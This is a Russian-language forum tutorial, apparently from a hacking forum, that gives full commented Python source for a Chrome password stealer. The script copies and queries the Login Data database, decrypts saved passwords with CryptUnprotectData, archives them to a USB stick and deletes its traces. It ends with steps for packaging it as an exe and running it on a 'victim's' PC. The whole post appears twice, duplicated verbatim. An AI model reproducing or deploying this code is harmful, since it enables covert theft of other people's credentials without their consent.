- 212
- 31
- 8 Янв 2020
Здравствуйте все! Для начала, перед тем как читать эту тему советую прочитать прошлую по ссылке https://gerki.in/threads/10308/#post-44293
После изучения модулей прошлой статьи мы теперь можем написать простой стиллер
Для начала я напишу весь код с комментариями к каждой строке
# - комментарий
\n - перенос строки
import os
import sqlite3
import win32crypt
import shutil
import zipfile
#во всех выше строках мы импортируем все нужные нам модули
username = os.getlogin() #узнаем имя пользователя на ПК
try: #я это делаю на случай если программа вдруг выбьет ошибку
text = 'Passwords\n'
text += 'url login password\n'
#в строках выше мы добавляли текст для будущего файла, их можно и не писать
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data'):#проверяем наличие файла(по этому пути хранятся все пароли)
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2')
#в строке выше мы копируем данный файл(мы не сможем открыть оригинал если в жертвы открыт Chrom)
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2')#открываем этот файл с помощью sqlite3(так как он написан на SQLite)
cursor = conn.cursor()#создаем курсор с помощью которого будем выбирать нужные таблицы из этой базы данных
cursor.execute('SELECT action_url, username_value, password_value FROM logins')#выбираем нужные столбцы
for result in cursor.fetchall():#начинаем цикл для полученных результатов
password = win32crypt.CryptUnprotectData(result[2])[1].decode()#дешифруем третий столбик с паролями(его шифрует Windows)
login = result[1]#присваиваем результат из второго столбца
url = result[0]#присваиваем результат из первого столбца
if password != '':#избавляемся от всех данных без пароля
text += url + ' ' + login + ' ' + password + '\n'#добавляем текст
except:
None#если программа каким то образом выбьет ошибку, то ничего не будет
file = open(os.getenv("APPDATA") + '\\google_pass.txt', 'w+')#создаем файл по данному пути
file.write(str(text) + '\n')#записываем туда весь текст
file.close()#закрываем файл
z = zipfile.ZipFile('любое_название_для_архива.zip', 'w')#создаем архив на флешке
z.write('C:\\Users\\' + username + '\\AppData\\google_pass.txt')#копируем файл в архив
z.close()#закрываем архив
doc = 'любое_название_для_архива.zip'
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2'):#проверяем существует ли файл
os.remove(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2')#удаляем
if os.path.exists(os.getenv("APPDATA") + '\\google_pass.txt'):
os.remove(os.getenv("APPDATA") + '\\google_pass.txt')#аналогично
Далее с помощью pyinstaller делаем из кода ехе файл
Вот ссылка на урок как это сделать Для просмотра ссылки Войдиили Зарегистрируйся (Второй способ)
Теперь скидуем файл на флешку
Вставляем флешку в ПК жертвы
Открываем файл
И у нас все пароль
Надеюсь вам понравилась данная тема, если возникли вопросы пишите ниже
Всем пока!
После изучения модулей прошлой статьи мы теперь можем написать простой стиллер
Для начала я напишу весь код с комментариями к каждой строке
# - комментарий
\n - перенос строки
import os
import sqlite3
import win32crypt
import shutil
import zipfile
#во всех выше строках мы импортируем все нужные нам модули
username = os.getlogin() #узнаем имя пользователя на ПК
try: #я это делаю на случай если программа вдруг выбьет ошибку
text = 'Passwords\n'
text += 'url login password\n'
#в строках выше мы добавляли текст для будущего файла, их можно и не писать
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data'):#проверяем наличие файла(по этому пути хранятся все пароли)
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2')
#в строке выше мы копируем данный файл(мы не сможем открыть оригинал если в жертвы открыт Chrom)
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2')#открываем этот файл с помощью sqlite3(так как он написан на SQLite)
cursor = conn.cursor()#создаем курсор с помощью которого будем выбирать нужные таблицы из этой базы данных
cursor.execute('SELECT action_url, username_value, password_value FROM logins')#выбираем нужные столбцы
for result in cursor.fetchall():#начинаем цикл для полученных результатов
password = win32crypt.CryptUnprotectData(result[2])[1].decode()#дешифруем третий столбик с паролями(его шифрует Windows)
login = result[1]#присваиваем результат из второго столбца
url = result[0]#присваиваем результат из первого столбца
if password != '':#избавляемся от всех данных без пароля
text += url + ' ' + login + ' ' + password + '\n'#добавляем текст
except:
None#если программа каким то образом выбьет ошибку, то ничего не будет
file = open(os.getenv("APPDATA") + '\\google_pass.txt', 'w+')#создаем файл по данному пути
file.write(str(text) + '\n')#записываем туда весь текст
file.close()#закрываем файл
z = zipfile.ZipFile('любое_название_для_архива.zip', 'w')#создаем архив на флешке
z.write('C:\\Users\\' + username + '\\AppData\\google_pass.txt')#копируем файл в архив
z.close()#закрываем архив
doc = 'любое_название_для_архива.zip'
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2'):#проверяем существует ли файл
os.remove(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2')#удаляем
if os.path.exists(os.getenv("APPDATA") + '\\google_pass.txt'):
os.remove(os.getenv("APPDATA") + '\\google_pass.txt')#аналогично
Далее с помощью pyinstaller делаем из кода ехе файл
Вот ссылка на урок как это сделать Для просмотра ссылки Войди
Теперь скидуем файл на флешку
Вставляем флешку в ПК жертвы
Открываем файл
И у нас все пароль
Надеюсь вам понравилась данная тема, если возникли вопросы пишите ниже
Всем пока!